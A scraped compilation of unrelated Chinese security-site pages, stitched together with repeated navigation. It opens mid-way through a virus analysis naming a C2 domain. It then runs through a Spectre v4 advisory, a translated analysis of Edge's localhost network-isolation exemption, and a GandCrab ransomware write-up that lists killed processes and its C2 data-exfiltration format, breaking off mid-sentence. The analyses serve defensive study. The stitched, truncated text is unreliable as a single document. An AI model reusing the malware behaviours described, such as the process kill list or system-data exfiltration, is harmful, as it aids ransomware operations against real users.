2)创建一个互斥体,目的是使系统中只有一个病毒实例在运行
3)创建一个线程,然后枚举资源列表,更新文件。
a)先和”2”一样,打开15654656注册表,判断病毒是否运行成功。

b)获取文件属性,并创建一个文件,读取文件,替换文件资源

c)加载刚刚替换的资源文件hra%u.dll

4)分析第一个线程:

a)获取网络主机名和地址

b) 比较用户名和密码:

c) 获取当前文件路径,并把文件分别复制到C,D,E盘中(E:g1fd.exe)【调用copyfile函数执行】

d) 如果在C,D,E中则会获取当前时间,然后执行程序,否则把文件复制到F盘,然后休眠500ms后创建下个线程.

5)分析第二个线程:
a)初始化网络配置,休眠100ms,获取本地时间,转化为int类型,和20030221比较,如果小于的话,则一直执行,然后创建CreateStartFun线程(本质是调用StartAddress函数)。

b)在StartAddress内部先访问一个短地址aa.re67das.com,然后获取IP地址利用socket链接。
c) 获取机器的基本配置,然后load hra%u.dll

d) 利用send()发送刚刚获取的机器信息。

e) 利用SelectAndRev3这个函数去不断的从服务器端接收控制信息,

f)输入16号控制码:

g)输入18号控制码(行为见脑图):

6)分析第三个线程:
a)获取本地时间,如果小于2013.02.21则线程不断执行

b)否则执行线程如c:
c)如上,分析线程2所示一致。只是比2多了一个文件写入的函数

7)分析第四个线程:

a) MainFun4只是比MainFun3多了一个连接特定url的函数,但是这个解密过程没分析出来,但是你可以通过apadns来获取相关信息。

本文转载自: Pediy.com
如若转载,请注明出处: https://bbs.pediy.com/thread-225721.htm
安全客 – 有思想的安全新媒体
恶意软件 逆向分析 骷髅病毒

HaCky 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ETW注册表监控windows内核实现原理
2019-02-21 14:30:47

WordPress 5.0.0远程代码执行漏洞分析
2019-02-21 11:30:53

Lucky双平台勒索者解密分析
2019-02-21 10:45:27

off by null漏洞getshell示例
2019-02-20 16:59:40
|发表评论
发表你的评论吧
昵称
妇科圣手
换一个
|评论列表
Helen · 2018-12-19 16:09:14 回复
哪里有这个样本的压缩包

猫头鹰 · 2018-09-21 19:23:58 回复
学习了,学习了,同时可以给小白同学们介绍本书《恶意代码分析实战》,很不错哦!!!

网瘾患者 · 2018-09-20 16:09:52 回复
请问类似与这样的文章有稿费吗

吃瓜群众 · 2018-09-20 18:19:17 回复
只管投看呗

YLLEN · 2018-09-20 12:05:00 回复
局域网感染型。

HaCky
这个人太懒了,签名都懒得写一个
文章
6
粉丝
3
TA的文章
Criakl勒索病毒分析简要
2019-02-20 10:30:01
某后门病毒分析报告
2019-02-15 16:30:40
NotPetya勒索病毒分析报告
2018-11-14 15:30:29
TrojanDownloader病毒分析报告
2018-10-11 16:30:02
骷髅病毒分析报告
2018-09-19 15:30:15
输入关键字搜索内容
相关文章
Lucky双平台勒索者解密分析
Criakl勒索病毒分析简要
2018年Android恶意软件专题报告
某后门病毒分析报告
Chrome扩展在持久化中的应用
2018年云上挖矿分析报告
勒索软件 Jaff 深入分析
热门推荐
文章目录
一:目录
二:样本信息
三:行为分析
四:详细分析
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

3639

3639
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
CVE-2018-3639 & CVE-2018-3640:CPU SSB/RSRE 漏洞预警
阅读量 64902 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-05-22 15:04:46
enter image description here
报告编号: B6-2018-052201

报告来源: 360-CERT

报告作者: 360-CERT

更新日期: 2018-05-22

0x00 漏洞概述
2018年5月21日,微软官方公布新CPU漏洞–Speculative Store Bypass (SSB)漏洞细节,属于日前预警的Spectre-NG的其中一个( Variant 4),由MSRC团队的Ken Johnson和Google Project Zero团队的Jann Horn共同发现,漏洞编号为CVE-2018-3639,目前Google Project Zero团队已公布相关poc代码,攻击者能通过v4拿到cpu或内存中的旧有内容。

同时,另一个CPU漏洞–Rogue System Register Read (RSRE)也被披露,属于Spectre-NG中的Variant 3a,漏洞编号为CVE-2018-3640。

360-CERT团队经过评估,认为漏洞风险等级重要,建议进行谨慎评估后更新。

0x01 漏洞影响面
AMD,ARM,Intel厂商的CPU分别受到不同程度的影响

目前,

微软在年初发布的针对Spectre and Meltdown漏洞的安全更新对此漏洞有一定的缓解。
主流浏览器厂商,Intel, RedHat, Xen等各家基础服务提供商也提供了相应的缓解措施。
Intel提供的受影响处理器列表:

Intel® Core™ i3 processor (45nm and 32nm)
Intel® Core™ i5 processor (45nm and 32nm)
Intel® Core™ i7 processor (45nm and 32nm)
Intel® Core™ M processor family (45nm and 32nm)
2nd generation Intel® Core™ processors
3rd generation Intel® Core™ processors
4th generation Intel® Core™ processors
5th generation Intel® Core™ processors
6th generation Intel® Core™ processors
7th generation Intel® Core™ processors
8th generation Intel® Core™ processors
Intel® Core™ X-series Processor Family for Intel® X99 platforms
Intel® Core™ X-series Processor Family for Intel® X299 platforms
Intel® Xeon® processor 3400 series
Intel® Xeon® processor 3600 series
Intel® Xeon® processor 5500 series
Intel® Xeon® processor 5600 series
Intel® Xeon® processor 6500 series
Intel® Xeon® processor 7500 series
Intel® Xeon® Processor E3 Family
Intel® Xeon® Processor E3 v2 Family
Intel® Xeon® Processor E3 v3 Family
Intel® Xeon® Processor E3 v4 Family
Intel® Xeon® Processor E3 v5 Family
Intel® Xeon® Processor E3 v6 Family
Intel® Xeon® Processor E5 Family
Intel® Xeon® Processor E5 v2 Family
Intel® Xeon® Processor E5 v3 Family
Intel® Xeon® Processor E5 v4 Family
Intel® Xeon® Processor E7 Family
Intel® Xeon® Processor E7 v2 Family
Intel® Xeon® Processor E7 v3 Family
Intel® Xeon® Processor E7 v4 Family
Intel® Xeon® Processor Scalable Family
Intel® Atom™ Processor C Series (C3308, C3338, C3508, C3538, C3558, C3708, C3750, C3758, C3808, C3830, C3850, C3858, C3950, C3955, C3958)
Intel® Atom™ Processor E Series
Intel® Atom™ Processor A Series
Intel® Atom™ Processor X Series (x5-E3930, x5-E3940, x7-E3950)
Intel® Atom™ Processor T Series (T5500, T5700)
Intel® Atom™ Processor Z Series
Intel® Celeron® Processor J Series (J3355, J3455, J4005, J4105)
Intel® Celeron® Processor N Series (N3450)
Intel® Pentium® Processor J Series (J4205)
Intel® Pentium® Processor N Series (N4000, N4100, N4200)
Intel® Pentium® Processor Silver Series (J5005, N5000)

0x02 漏洞细节
Speculative Store Bypass (SSB)–CVE-2018-3639漏洞细节,攻击者能通过v4拿到cpu或内存中的旧有内容,漏洞可能发生在如下场景:

01: 88040F mov [rdi+rcx],al
02: 4C0FB6040E movzx r8,byte [rsi+rcx]
03: 49C1E00C shl r8,byte 0xc
04: 428B0402 mov eax,[rdx+r8]
如果RDI和RSI指向的是同一个地址,则假设第1行中的MOV指令在特殊情况下可能需要额外的时间来执行( 如果计算RDI+RCX的地址表达式正在等待先前的指令执行)。在这种情况下,CPU可能会预测MOVZX不依赖于MOV,并且可以在执行保存AL数据的MOV之前进行预测执行。这可能会导致位于RSI+RCX的内存中的旧数据被加载到R8中,从而导致第四行代码使用了错误的数据。

该漏洞适用的攻击场景如下:

alt

Poc的运行效果如下:

alt

alt

Rogue System Register Read (RSRE)–CVE-2018-3640漏洞:

该漏洞允许具有本地用户访问权限的攻击者在有预测执行能力的微处理器上,可以通过侧信道攻击读取系统寄存器的值

0x03 缓解措施
针对Speculative Store Bypass (SSB)–CVE-2018-3639的缓解措施:

利用序列化指令(例如x86/x64上的LFENCE 和 ARM上的SSBB指令)来屏蔽预测执行,缓解SSB漏洞
升级微码或固件在硬件方面修补该漏洞
对于CVE-2017-5753 (Spectre variant 1)漏洞的缓解措施同样适用于该漏洞
升级主流浏览器到最新版(360安全浏览器,Firefox,Chrome,Edge 等)
其他缓解措施对该漏洞的影响:

alt

0x04 时间线
2018-05-07 360CERT发布《Spectre-NG:多个新CPU漏洞预警》

2018-05-21 CVE-2018-3639 & CVE-2018-3640漏洞被公布

2018-05-22 360CERT发布CVE-2018-3639 & CVE-2018-3640漏洞预警通告

0x05 参考链接
https://blogs.technet.microsoft.com/srd/2018/05/21/analysis-and-mitigation-of-speculative-store-bypass-cve-2018-3639/
https://blogs.technet.microsoft.com/srd/2018/03/15/mitigating-speculative-execution-side-channel-hardware-vulnerabilities/
https://bugs.chromium.org/p/project-zero/issues/detail?id=1528
https://access.redhat.com/security/vulnerabilities/ssbd
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00115.html
本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/145749
安全客 – 有思想的安全新媒体
漏洞预警 CPU漏洞 安全漏洞 CVE-2018-3639 CVE-2018-3640

360CERT 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ETW注册表监控windows内核实现原理
2019-02-21 14:30:47

WordPress 5.0.0远程代码执行漏洞分析
2019-02-21 11:30:53

Lucky双平台勒索者解密分析
2019-02-21 10:45:27

off by null漏洞getshell示例
2019-02-20 16:59:40
|发表评论
发表你的评论吧
昵称
带头大哥
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
360CERT
360CERT是360成立的针对全球重要网络安全事件进行快速预警、应急响应的安全协调中心。
文章
441
粉丝
64
TA的文章
CVE-2018-2025[0-3] WinRAR 代码执行漏洞预警
2019-02-21 11:45:21
2月21日每日安全热点 – WinRAR中存在19年的代码执行漏洞
2019-02-21 10:25:05
2月20日每日安全热点 – 社工妹子跟踪狂
2019-02-20 09:59:25
2月19日每日安全热点 – APT-C-36: 针对哥伦比亚政府机构和公司的持续攻击
2019-02-19 09:45:56
Snapd Ubuntu 提权分析
2019-02-18 14:54:38
输入关键字搜索内容
相关文章
CVE-2019-7304:Linux包管理器snap本地提权漏洞预警
微软Exchange和DHCP服务端组件漏洞预警
CVE-2019-5736:runc容器逃逸漏洞预警
iPhone FaceTime 通话漏洞预警
CVE-2019-6116: ghostscript沙箱绕过命令执行漏洞预警
Exchange Server 提权漏洞预警
CVE-2019-3462: apt/apt-get 远程代码执行漏洞预警
热门推荐
文章目录
0x00 漏洞概述
0x01 漏洞影响面
0x02 漏洞细节
0x03 缓解措施
0x04 时间线
0x05 参考链接
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

edge网络

edge网络
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
Edge与localhost网络隔离
阅读量 75454 | 稿费 160

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-07-26 14:00:35
译文声明
本文是翻译文章,文章原作者,文章来源:tyranidslair.blogspot.com
原文地址:https://tyranidslair.blogspot.com/2018/07/uwp-localhost-network-isolation-and-edge.html

译文仅供参考,具体内容表达以及含义原文为准

×

一、前言
本文介绍了Windows中新增的一个有趣的“功能”,该功能支持Edge浏览器访问本地环回(loopback)网络接口。本文已在Windows 10 1803(Edge 42.17134.1.0 )以及Windows 10 RS5 17713(Edge 43.17713.1000.0 )上验证通过。

二、具体分析
我非常喜欢微软从Windows 8开始引入的App Container(AC)沙盒概念。该机制将Windows上的沙盒环境从受限令牌(非常难以理解并需要耗费大量精力的东西)迁移到了一个基于功能(capability)的合理模型上,此时除非我们在应用启动时显式赋予了各种功能,否则就会受到种种限制。在Windows 8上,沙盒中只能访问已知的一小部分功能。在Windows 10上,受限范围已大大扩展,应用程序可以定义自己的功能,并且通过Windows访问控制机制来访问这些功能。

我一直在关注AC及其在网络隔离方面的能力,在AC中,若要访问网络,则需要赋予“internetClient”之类的功能。很少有人知道,即便处于非常受限的令牌沙盒中,我们也可以访问raw AFD驱动来打开网络套接字。AC已经非常顺利地解决了这个问题,它并没有阻止我们访问AFD驱动,而是让防火墙检查程序是否具备对应的功能,据此阻止连接请求或者接受套接字。

在构建通用沙盒机制的过程中,这种AC网络隔离原语会碰到一个问题,那就是无论我们赋予AC应用什么功能,它都无法访问localhost网络。比如,在测试过程中,我们可能希望沙盒应用能够访问托管在本地的一个web服务器,或者使用本地代理以MITM方式监听流量。这些场景都无法适用于只具备相应功能的AC沙盒。

之所以阻止沙盒访问localhost,很大程度上是因为潜在的安全风险问题。Windows在本地运行了许多服务(如SMB服务器),这些服务很容易被滥用。其实防火墙服务中存储了一个不受localhost限制的软件包列表,我们可以使用防火墙API(如NetworkIsolationSetAppContainerConfig函数)或者使用Windows中内置的CheckNetIsolation工具来访问或者修改这一列表。这种方式听起来比较合理,因为访问loopback接口是开发者会去尝试的选项,正常应用一般不会依赖这一点。我比较好奇的是这个豁免列表中是否已经存在一些AC,大家可以执行CheckNetIsolation LoopbackExempt -s命令列出本地系统中不受限制的那些AC。

在我的Windows 10主机上,该列表中共有2个条目,应该没有应用会使用这种开发者功能,这一点比较奇怪。第一个条目的名称为AppContainer NOT FOUND,表示已注册的SID与已注册的AC不匹配。第二个条目的使用了看起来毫无意义的名称001,这至少表明这是当前系统上的一个应用程序。这究竟是怎么回事?我们可以使用我的NtObjectManager PS模块,根据对应的SID值,通过Get-NtSid cmdlet来分析001这个名字是否可以解析成更容易理解的名称。

水落石出,001实际上是Edge的一个子AC,我们可以根据SID的长度来猜测。正常的AC SID具备8个子项,而子AC则具备12个子项(基础AC SID后附加4个子项)。回过头来看这个未注册的SID,我们可以发现它是一个Edge AC SID,并且带有尚未注册的子项。001这个AC貌似是用于托管Internet内容的AC(我们可以参考X41Sec关于浏览器安全白皮书的第54页来验证这一点)。

这一点并不奇怪。Edge刚发布时并不能访问localhost资源(比如,IBM在一份帮助文档中指导用户如何使用CheckNetIsolation来添加例外)。然而,在某个研发阶段中,微软添加了一个about:flags选项,允许Edge访问localhost资源,现在这个选项看起来已经变成默认配置,如下图所示(微软仍友情提示启用该选项可能使用户设备面临安全风险):

比较有趣的是,如果我们禁用这个选项并重启Edge,那么该例外条目就会自动被清除,而再次启用该选项又会自动恢复这个例外条目。为什么这一点比较有趣?这是因为根据以往的经验(比如Eric Lawrence写的这篇文章),我们需要管理员权限才能修改这个例外列表,也许微软现在修改了这个规则?我们可以验证这个猜测是否准确,使用CheckNetIsolation工具,传入-a -p=SID参数,具体命令如下:

因此,我猜测开发者并没有使用CheckNetIsolation工具来添加例外规则,现在这种情况真的让我很感兴趣。由于Edge是操作系统内置的应用,因此微软很有可能添加了一些“安全”检测机制,允许Edge将自己加入例外列表,但具体位置在哪呢?

最简单的一种方法就是利用实现了NetworkIsolationSetAppContainerConfig的RPC服务(我反汇编了这个API,因此知道有这样一个RPC服务)。我凭直觉猜测具体实现应该托管于“Windows Defender Firewall”服务中,该服务由MPSSVC DLL负责实现。如下代码为RPC服务器对该API的简化版实现代码:

HRESULT RPC_NetworkIsolationSetAppContainerConfig(handle_t handle,
DWORD dwNumPublicAppCs,
PSID_AND_ATTRIBUTES appContainerSids) {

if (!FwRpcAPIsIsPackageAccessGranted(handle)) {
HRESULT hr;
BOOL developer_mode = FALSE:
IsDeveloperModeEnabled(&developer_mode);
if (developer_mode) {
hr = FwRpcAPIsSecModeAccessCheckForClient(1, handle);
if (FAILED(hr)) {
return hr;
}
}
else
{
hr = FwRpcAPIsSecModeAccessCheckForClient(2, handle);
if (FAILED(hr)) {
return hr;
}
}
}
return FwMoneisAppContainerSetConfig(dwNumPublicAppCs,
appContainerSids);
}
如上所示,代码中有个FwRpcAPIsIsPackageAccessGranted函数,函数名中包含一个“Package”字符串,表示该函数可能会检查一些AC软件包信息。如果该函数调用成功,则会跳过代码中的安全检查过程,然后调用FwMoneisAppContainerSetConfig这个函数。需要注意的是,安全检查过程会根据是否处于开发者模式而有所不同,如果启用了开发者模式,我们还可以绕过管理员检查过程,根据这一点我们可以再次确认这种例外列表主要是为开发者而设计的一种特性。

接下来我们来看一下FwRpcAPIsIsPackageAccessGranted的具体实现:

const WCHAR* allowedPackageFamilies[] = {
L”Microsoft.MicrosoftEdge_8wekyb3d8bbwe”,
L”Microsoft.MicrosoftEdgeBeta_8wekyb3d8bbwe”,
L”Microsoft.zMicrosoftEdge_8wekyb3d8bbwe”
};

HRESULT FwRpcAPIsIsPackageAccessGranted(handle_t handle) {
HANDLE token;
FwRpcAPIsGetAccessTokenFromClientBinding(handle, &token);

WCHAR* package_id;
RtlQueryPackageIdentity(token, &package_id);
WCHAR family_name[0x100];
PackageFamilyNameFromFullName(package_id, family_name)

for (int i = 0;
i < _countof(allowedPackageFamilies); ++i) { if (wcsicmp(family_name, allowedPackageFamilies[i]) == 0) { return S_OK; } } return E_FAIL; } FwRpcAPIsIsPackageAccessGranted函数会获取调用者的token信息,查询软件包的Family Name,将该名称与硬编码的列表进行对比。如果调用者位于Edge包(或者某些beta版本)中,则返回成功,使上层函数跳过admin检查过程。这就能解释Edge如何将自己加入例外列表中,现在我们还需要知道需要哪些访问权限才能使用RPC服务器。对ALPC服务器来说存在两项安全检查,分别为连接到ALPC的端口以及一个可选的安全回调例程。我们可以选择逆向分析该服务所对应的二进制程序,但还可以选择更加简单的方法,从ALPC服务器端口进行转储,这一次我们还可以使用我的NtObjectManager模块。 由于RPC服务并没有指定服务的名称,因此RPC库会生成一个随机的名称,格式为LRPC-XXXXX。我们通常可以使用EPMAPPER来寻找实际名称,但我在CheckNetIsolation的NtAlpcConnectPort上设置了断点,导出连接名。然后我们就可以在服务进程中找到ALPC端口的句柄,导出安全描述符。该列表中包含Everyone以及所有的网络相关功能,因此具备网络访问权限的任何AC进程都可以与这些API交互(包括Edge LPAC在内)。因此所有的Edge进程都可以访问这个功能,添加任意包。Edge中的具体实现位于emodel!SetACLoopbackExemptions函数中。 了解这些知识后,现在我们将代码汇总起来,利用这个“功能”来添加任意例外条目。大家可以访问我的Github来下载这个PowerShell脚本。 三、总结 我猜测微软之所以采用这种方式来添加localhost访问权限,原因在于这样就不需要去修改内核驱动,只需要在用户模式组件上进行修改。但我有点愤愤不平,这样让Edge在地位上比其他浏览器有所不同。从道理上讲,即便封装了Edge,其他应用也不应该具备添加localhost例外的能力。如果微软能在未来添加相应的功能那再好不过,不过由于目前RS5仍然采用的是这种办法,我对此并不乐观。 这是不是一种安全问题呢?得具体情况具体分析。你可以认为在默认配置下能够访问localhost资源本身就是一种危险行为,但微软又在about:flags页面中明确给出了安全风险提示。另一方面所有的浏览器都支持这种功能,所以我也不确定这是不是真的属于安全风险。 具体的实现代码非常粗糙,我惊讶的是这种代码竟能够通过安全审查。这里我们可以列出存在的一些问题: 1、软件包的family检查过程不是特别严格,与RPC服务较弱的权限结合起来后,我们就可以让任意Edge进程具备添加例外的能力; 2、例外范围并没有与调用进程关联起来,因此任意SID都可以添加到例外中。 默认情况,只有面向Internet的AC才能够访问localhost,比如,如果我们攻破了Flash进程(为子AC “006”),那么就可以将自身加入例外列表中,进一步尝试攻击在localhost监听的服务。如果只有微软Edge进程而不是任何进程能够添加例外列表那就更好一些,但最好的还是通过正规的功能来支持这一特性,而不是通过后门的方式来实现,这样每个人都可以利用这一特性。 本文翻译自 tyranidslair.blogspot.com, 原文链接 。如若转载请注明出处。 edge localhost 网络隔离 興趣使然的小胃 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter |推荐阅读 ETW注册表监控windows内核实现原理 2019-02-21 14:30:47 WordPress 5.0.0远程代码执行漏洞分析 2019-02-21 11:30:53 Lucky双平台勒索者解密分析 2019-02-21 10:45:27 off by null漏洞getshell示例 2019-02-20 16:59:40 |发表评论 发表你的评论吧 昵称 管理员 换一个 |评论列表 还没有评论呢,快去抢个沙发吧~ 興趣使然的小胃 肥叶好香锅,孜孜不倦 文章 334 粉丝 55 TA的文章 WordPress 5.0.0远程代码执行漏洞分析 2019-02-21 11:30:53 RSAC创新沙盒2019:云、身份、应用安全成为焦点 2019-02-20 16:00:59 Dirty Sock:Ubuntu提权漏洞分析 2019-02-14 11:00:09 Chrome扩展在持久化中的应用 2019-02-14 10:30:31 Foxit Reader SDK ActiveX漏洞分析 2019-02-13 15:30:20 输入关键字搜索内容 相关文章 ETW注册表监控windows内核实现原理 WordPress 5.0.0远程代码执行漏洞分析 Lucky双平台勒索者解密分析 off by null漏洞getshell示例 热门推荐 文章目录 一、前言 二、具体分析 三、总结 安全客Logo 安全客 安全客 关于我们 加入我们 联系我们 用户协议 商务合作 合作内容 联系方式 友情链接 内容须知 投稿须知 转载须知 合作单位 安全客 安全客 Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 Loading...0daybank

勒索软件

勒索软件
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
GandCrab勒索软件借助RIG及GrandSoft进行传播
阅读量 83627 | 稿费 200

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-02-02 15:30:13
译文声明
本文是翻译文章,文章原作者Malwarebytes Labs,文章来源:blog.malwarebytes.com
原文地址:https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/

译文仅供参考,具体内容表达以及含义原文为准

×

一、前言
上周末时,我们发现GandCrab这款新型勒索软件开始粉墨登场。令人惊讶的是,这款恶意软件借助了两款漏洞利用工具包(exploit kit)进行传播,这两款套件分别为RIG EK以及GrandSoft EK。

为什么这一点令人惊讶?与Magnitude EK不同的是(众所周知,Magnitude EK一直在传播Magniber 勒索软件),今年来其他工具包释放的都是其他类型的载荷,比如Ramnit或者SmokeLoader,以及一些RAT或挖矿程序。

尽管在2017年最后一个季度中,勒索软件的增长幅度有所放缓,但这种安全威胁依然不容忽视,攻击者可以通过这种手段获得可观的收入。

二、传播渠道
GandCrab的首次活动时间可以追溯到1月26日,随后我们也可以在漏洞利用攻击活动中找到它的踪影。

2.1 RIG Exloit Kit
之前业界对Seamless gate已经分析得较为透彻,但随后Seamless衍生出了许多分支,传播不同的载荷,以增加自身的多样性。虽然Seamless正在逐步切换到包含俄文字符的国际域名(International Domain Names,IDN),但我们也发现了一条不同的攻击链,该攻击链使用的是标准的域名(备注:这条攻击链中同样也会重定向到Magnitude exploit kit)。

此次攻击活动中,我们可以观察到恶意软件请求了一些常见的地址,这些地址包含我们已知的IP信息,但也用到了比较特殊的gav[0-9].php地址,该地址用来重定向至RIG EK。

目前,攻击者只使用了gav4.php这个地址来传播这款勒索软件。

2.2 GrandSoft Exploit Kit
这款Exploit Kit年代已经比较久远,并不常见,人们曾经认为它已不再活跃。然而事实证明攻击者也用到了这款工具包来传播GandCrab。

GrandSoft EK所用的下载页面并没有经过混淆处理,并且我们发现该工具包也用到了其他Exploit Kit中类似的功能。

三、整体情况
有趣的是,GrandCrab并没有要求受害者使用流行的Bitcoin货币来支付,而是用到了知名度较低的一款加密货币:Dash(达世币)。这表明攻击者追求的是在匿名性方面以及交易费方面比BTC更加优秀的加密货币。

四、技术分析
从安全分析角度来看,解封装后的二进制程序非常简单,并没有混淆数据或代码,只对第一层封装器做了些处理。恶意软件在数据区中保存了各种明文,如不处理的文件类型、Web请求变量、URL地址、AV清单以及勒索信息等。只要稍作分析,你就有可能通过二进制文件中的字符串信息,推测出这款恶意软件的部分功能。

恶意软件的代码流内部关联度比较高,因此从逆向分析工程角度来看,即使只用反汇编器来静态分析这个样本,我们也能得到比较准确的分析结果。程序代码可以分成3个主要部分:初始化部分(initialization)、网络部分(network)以及加密部分(encryption)。

4.1 初始化
解封装之后,GranCrab首先会执行一些函数,这些函数的功能是收集一些信息,以便后续使用。恶意软件会查询与用户有关的信息,如:

用户名
键盘类型
主机名
反病毒软件情况
处理器类型
IP地址 操作系统版本
磁盘空间情况
系统语言
活动的驱动器
区域化设置信息
当前Windows版本
处理器架构
恶意软件会特意去检查键盘布局是否采用俄语布局,使用某个整数来表明键盘类型,通过某个字符串来收集这个信息。恶意软件使用某些变量名来记录收集到的信息,如下所示:

随后,恶意软件通过字母表来遍历所有盘符,查询哪些驱动器存在,判断这些驱动器的具体类型。如果该驱动器为CDRom、未知驱动器或者不存在的驱动器,则会被恶意软件跳过。如果恶意软件找到一个固定驱动器,则会将驱动器的名字复制到某个缓冲区中,使用某个字符串来表示驱动器的类型。比如,C:盘对应的是FIXED。

然后恶意软件会收集可用磁盘空间及扇区信息,通过printf函数将其转换为一串数字,如C:FIXED_64317550592。遍历完所有驱动器后,恶意软件会得到一份磁盘清单。

随后,恶意软件将收集到的所有信息汇总在一起,并在某个时刻使用GET请求将这些信息发往C2服务器。系统信息所对应的请求格式如下所示:

ip=99.8.160.100&pc_user=virusLab&pc_name=VI
恶意软件也会搜索正在运行的进程,检查其中是否存在某些反病毒程序,这些信息经过处理后也会发给C2服务器。

接下来,恶意软件利用收集到的一些系统信息以及生成的ID来创建互斥量(mutex),如下所示:

Globalpc_group=WORKGROUP&ransom_id=c9ed65de824663f

为了后续加密过程能顺利进行,恶意软件会遍历内置的一份进程列表,结束该列表中存在的进程。对勒索软件而言,这是一种常用的技术,可以终止某些进程,避免某些文件被锁住而无法加密。

需要终止的进程如下:

msftesql.exe
sqlagent.exe
sqlbrowser.exe
sqlservr.exe
sqlwriter.exe
oracle.exe
ocssd.exe
dbsnmp.exe
synctime.exe
mydesktopqos.exe
agntsvc.exe
isqlplussvc.exe
xfssvccon.exe
mydesktopservice.exe
ocautoupds.exe
agntsvc.exe
agntsvc.exe
agntsvc.exe
encsvc.exe
firefoxconfig.exe
tbirdconfig.exe
ocomm.exe
mysqld.exe
mysqld-nt.exe
mysqld-opt.exe
dbeng50.exe
sqbcoreservice.exe
excel.exe
infopath.exe
msaccess.exe
mspub.exe
onenote.exe
outlook.exe
powerpnt.exe
steam.exe
thebat.exe
thebat64.exe
thunderbird.exe
visio.exe
winword.exe
wordpad.exe
接下来,恶意软件会调用内置的加密函数来生成密钥。GandCrab会在客户端生成公钥及私钥,然后通过Advapi32.dll中的API调用来使用标准的微软加密程序库。恶意软件使用RSA算法来调用CryptGenKey函数。

4.2 网络行为
现在,勒索软件会进入主循环,处理互联网相关功能。这部分代码中,如果执行成功,则会进入加密部分代码,否则,恶意软件会不断循环,直至成功为止。如果一直不能成功执行,则恶意软件永远不会加密任何文件。

在这部分代码中,恶意软件首先向ipv4bot.whatismyipaddress.com发起GET请求,查询本机的IP地址,然后将其添加到系统信息中,通过GET请求发给服务器。

随后,恶意软件开始处理一段二进制数据,这段数据为初始化过程中生成的RSA公钥。恶意软件通过CryptBinaryToStringA API,传入CRYPT_STRING_NOCRLF以及CRYPT_STRING_BASE64参数,将公钥转换为base64编码,并将编码结果加入GET请求字符串中。RSA密钥的生成及转化过程如下。

使用加密API生成的RSA公钥如下:

A7 EC BD E2 49 43 E1 11 DA 12 10 E0 25 59 AA 83 77 35 FC 3E 49 C8 3B 6C 3D 91 CF FF 96 6E D8 45 FE 8A 58 20 E6 CB 91 AB 99 6A E2 04 EC 58 66 95 05 8C 2F 7E C6 19 6D 24 B5 5F C4 9A 01 3D 3B FB 31 4E AC 25 07 8C 0E 6C 57 4C C0 23 24 3A EB 57 97 17 79 F8 62 73 6B AD B2 09 60 BB B7 9A CF F9 5B 68 B8 C1 44 07 F5 5E 3E 06 FE C2 35 CF 99 82 29 28 37 1B E6 51 29 6C 0B 87 89 F9 90 26 F7 CC DA 75 C4 46 A1 E3 30 09 C0 6A CB 5E CB 87 8E 40 EF 4C 7E 02 AE E8 06 6A D7 24 FC 0E 40 EA 69 CD 6D 8D 24 92 6E 53 2F D2 69 D2 A2 F3 97 54 63 EB D9 C7 BD 9E 41 19 91 F1 6B D6 CA AD 9E 0E D3 0B A0 53 50 84 87 6D 49 4C 49 D2 3B 8E 80 F7 7F 35 F1 D7 A7 81 0F 90 04 40 AC 4B 7C ED 37 71 8A B1 FA 84 33 33 FB 62 EE 04 A3 C7 9A 47 2C 64 64 95 3D 34 A5 CC 12 6E E4 81 40 E6 7F 03 02 C4 57 D6
转化为base64编码为:

BgIAAACkAABSU0ExAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfW
加密密钥与之前收集到的系统所有信息合在一起,通过GET请求字符串发往C2服务器,请求字符串如下所示:

